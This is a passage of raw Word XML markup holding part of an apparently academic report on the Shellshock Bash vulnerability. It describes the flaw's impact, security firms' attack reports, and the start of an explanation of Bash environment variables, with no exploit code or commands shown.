          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> characteristic of Shellshock is the high impact on the security of victim systems after a successful attack. For the attackers, the gain of privilege to run commands in Bash of the target systems generally means the almost full control of the system. With this privilege, the attackers are already able to perform vicious acts such as visiting internal data, e.g., password files and highly confidential commercial information, reconfiguring the environment and planting more malicious codes. With a little more effort, these privileges could be escalated to root access privilege by experienced attackers. Moreover, there are evidence</w:t>
      </w:r>
      <w:r w:rsidR="0035401C">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> showing that automatic attack kit</w:t>
      </w:r>
      <w:r w:rsidR="00E46243">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002030FA">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>may have</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> already be</w:t>
      </w:r>
      <w:r w:rsidR="002030FA">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>en</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> developed and</w:t>
      </w:r>
      <w:r w:rsidR="00060599">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> are</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> available to less experienced attackers, which greatly inc</w:t>
      </w:r>
      <w:r w:rsidR="00DD3BC1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rease</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="009C0B95" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>gravity</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. Nonetheless, it is widely believed that these features of Shellshock make it a highly potential target for worms.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00F636E9">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2. Attack reports.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">In only as short as four days after the publication of Shellshock, a security company </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Incapsula</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DF0418">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> claimed</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> that its Web application firewall deflected more than 217,089 exploit attempts on over 4,115</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>mains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>[12]</w:t>
      </w:r>
      <w:r w:rsidR="005325A9">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. However, the company estimated</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> that the total number of Shellshock attacks could be as high as 1 </w:t>
      </w:r>
      <w:r w:rsidR="00506527">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">illion. By September 30, another company </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Cloudflare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> reported that it had already blocked over 1.1 million Shellshock a</w:t>
      </w:r>
      <w:r w:rsidR="00D41A9C">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ttacks. Dell </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D41A9C">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SecureWorks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D41A9C">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> reported</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> that it repelled 140,000 scans looking for vulner</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ble systems, as well as attacks targeting the flaw against its clients, between Sept. 24 and Sept. 29. Honeypots had been put in place to analyze these attack attempts by threat intelligence firm </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ThreatStream</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. According to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ThreatSt</w:t>
      </w:r>
      <w:r w:rsidR="002372FD">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ream</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002372FD">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, most of these attempts could</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> be attributed into two categories: reconnaissance and real attacks. The first category </w:t>
      </w:r>
      <w:r w:rsidR="00BF2DE4">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>was</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> attempts to scan the network in order to test the proofs-of-concept of the vulnerability in machines or collecting information of affected computer systems for further exploitation. The second </w:t>
      </w:r>
      <w:r w:rsidR="00F908E3" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">category </w:t>
      </w:r>
      <w:r w:rsidR="00F908E3">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>was</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> real attacks that </w:t>
      </w:r>
      <w:r w:rsidR="002B277C">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>were</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> believed to have already br</w:t>
      </w:r>
      <w:r w:rsidRPr="00316A35">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ought</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> damage</w:t>
      </w:r>
      <w:r w:rsidRPr="00316A35">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to unknown</w:t>
      </w:r>
      <w:r w:rsidR="00970CF0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> number of</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> hosts. However, the honeypots they used were only detecting</w:t>
      </w:r>
      <w:r w:rsidRPr="00316A35">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> attacks</w:t>
      </w:r>
      <w:r w:rsidR="00410386">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>on HTTP, with all information of attacks targeting FTP, SMTP, SSH, DHCP and other potential routes mis</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ing.  Besides, a malware that exploits Shellshock named BASHLITE has already been spread on an u</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>known scale. Fortunately patches have been developed in major operating systems soon after the ou</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">burst and security alerts were broadcasted over the Internet. However, many experts are still worried that plenty of machines are still out there not fixed and prone to attack. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00F636E9">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3.  Principles and technical details</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">To understand the principle of Shellshock, </w:t>
      </w:r>
      <w:r w:rsidR="00C91D00">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">It is </w:t>
      </w:r>
      <w:r w:rsidR="009E0738">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">necessary </w:t>
      </w:r>
      <w:r w:rsidR="00C91D00">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> start from explaining how the env</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ronmental variables</w:t>
      </w:r>
      <w:r w:rsidRPr="00316A35">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> functions work in Bash. In Linux and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Unix</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> systems, every process has its own set of environment variables that are inherited from its parent process at the moment of its creation. These variables are defined to affect the behavior of the running processes. Besides, the normal oper</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tion of a process also requires essential information stored in environmental variables, such as prefe</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ences and temporary data.  Frequently used environmental variables incl</w:t>
      </w:r>
      <w:r w:rsidR="0058322E">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ude $PATH, $HOME, $PS1, $MAIL. </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
